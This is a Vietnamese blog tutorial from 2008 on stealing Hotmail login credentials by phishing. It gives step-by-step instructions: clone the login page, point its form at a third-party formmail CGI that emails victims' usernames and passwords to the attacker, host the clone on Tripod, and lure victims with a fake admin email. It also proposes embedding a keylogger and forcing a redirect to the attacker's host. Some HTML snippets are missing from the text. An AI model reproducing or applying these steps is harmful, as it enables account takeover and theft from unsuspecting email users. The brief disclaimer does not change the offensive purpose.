Hacking Webmail

Hacking Web Mail



Saturday, 12. July 2008, 16:56:39Bài viết này chỉ được dùng với mục đích học tập và trao đổi kinh nghiệm...Tôi không khuyến khích bạn đi phá hoại, cũng như chịu bất cứ trách nhiệm gì về hậu quả do bạn sử dụng nó gây ra. Các bạn có thể tự do sử dụng nó, nhưng mong các bạn tôn trọng Copright một chút, khi cần trích dẫn ở chỗ nào khác trong tài liệu này, vui lòng ghi rõ nguồn cũng như tên của người dịch (hê hê tên tôi đấy ạ).

Bài viết này sẽ đề đến kỹ thuật Hack các Free Web Mail. Bằng cách gửi một thông báo đến lừa nạn nhân điền User và Pass. Rồi nó sẽ được Send cho chúng ta. Tôi xin lấy một ví dụ cụ thể trong bài này là Hotmail của MSN.

Đầu tiên bạn đăng ký một Acc Hotmail (hay bất cứ Web Mail nào khác cũng được). Để an toàn thì bạn không lên nhập các thông tin thật về mình...Bạn hiểu chứ ?

Tiếp đến tạo một Host ở Tripod.com (hay bất cứ Host nào khác có Support CGI). Sử dụng Acc Hotmail (hay Acc Web Mail) ở trên để đăng ký và nhớ cũng đừng vào thông tin chính xác về bạn.

Bây giờ đợi một chút...Trong lúc này tôi thường tranh thủ tiếp đạn (một cái bánh mỳ + một cốc Coffee chẳng hạn è thật tuyệt)...OK! bây giờ chúng ta đến Acc Hotmail và sẽ có thông tin về Acc Tripod mà bạn vừa đăng ký.

Bạn đã tiếp đạn đầy đủ chưa or sẵn sàng chưa ? Nếu có thì chúng ta tiếp tục. Bây giờ chúng ta sẽ đến Web Mail mà nạn nhân của chúng ta sử dụng. Vì đây là Hotmail lên chúng ta chẳng cần đi đâu hết cả ;-) Không vào bất cứ thông tin hợp lệ nào. Bởi chúng ta có biết đâu mà vào...Nếu biết đã không phải cực nhọc như vầy rùi. Sau lần đầu Login không thành công bạn sẽ they thông báo “Please re-login” or cái gì đó báo là bạn không đăng nhập được...Đưng lo, trò chơi bây giờ mới thực sự bắt đầu.

Bạn hãy Save lại toàn bộ nội dung trang đó và nhớ có cả đồ hoạ nữa nha. Dùng bất cứ Editor nào Open file *.html đó ra. Tiếp tục thực hiện theo các bước sau:

Bước 1:Tìm dòng có thẻ ... và thay đổi nó thành . Nó sẽ Destroy đi cái Popup khó chịu của Tripod. Như vậy nạn nhân không hề biết rằng mình đã truy cập ra ngoài Hotmail. Và mọi thông tin Login của mình có thể bị nắm giữ.

Bước 2: Tìm dòng

và thay đổi thành

your@email: Địa chỉ Mail mà bạn đăng ký ở trên. Hay địa chỉ Mail mà bạn dùng để nhận Pass của nạn nhân.

http://www.free-cgi.ch/cgi-bin/formmail-a.cgièCó thể được thay thể bằng một URL or Server khác...Nhiệm vụ chính của nó là dùng để Connect Sendpass đến cho ta.

Bước 3: Upload file *.html đó lên Host Tripod mà bạn vừa đăng ký ở trên. Nhớ là phải có đồ hoạ và sao cho nó giống y chang như Page Login của Hotmail thật.

Bước 4: Send cho nạn nhân một Fake Mail bằng định dạng HTML mà các Tag quan trọng ở đầu có dạng tag:

url=your tripod url”> èĐịa chỉ của Host Tripod mà bạn đã đăng ký. Ví dụ: http://binhnx.tripod.com chẳng hạn.

Lưu ý: Mail này phải ra vẻ “Admin” một tý để lừa nạn nhân Login. Nếu bạn rành về HTA or Active X thì bạn cứ nhúng vô *.html một Keylogger. Mọi cú gõ phím của nanh nhân sẽ đều bị ta nắm bắt. Giả sử bạn đã có 1 host nhúng sắn Keylogger như http://binhnx.tripod.com chẳng hạn. Chèn tiếp vào *.html một vài dòng như sau (phải thêm ở trong phần ... è Nó sẽ tự động Redirect nạn nhân đến Host của ta để nhận Keylogger mặc dù họ không muốn...


open.window (http://binhnx.tripod.com);


Bây giờ nếu nạn nhân Login thì toàn bộ thông tin như User và Pass sẽ được Send về cho ta...Thật tuyệt phải không ?

P/S: Đây chỉ là một trang hàng nghìn cách Hack Web Mail...Ngoài cách này ra còn có các cách như tận dụng điểm yếu của script, Java script, Login script...Nhưng do khuôn khổ bài viết lên tôi không thể đề cập ra được. Bản thân tôi hay dùng Social Engineer è Cách này chẳng cần phải mệt mỏi như vậy. Chỉ cần hiểu biết về nguyên lý hoạt động của các Web Mail và đặc biệt là dẻo mỏ là OK liền. Cách này các chị em xài tốt lắm...Nhưng tôi sẽ không nói đâu ;-) Ai thương tui là tui nói liền đó è hố hố...

Lời kết : Hy vọng qua bài viết nhỏ này bạn đã hiểu được cách Hack các Web Mail...Và nhớ đừng làm gì phạm pháp nha.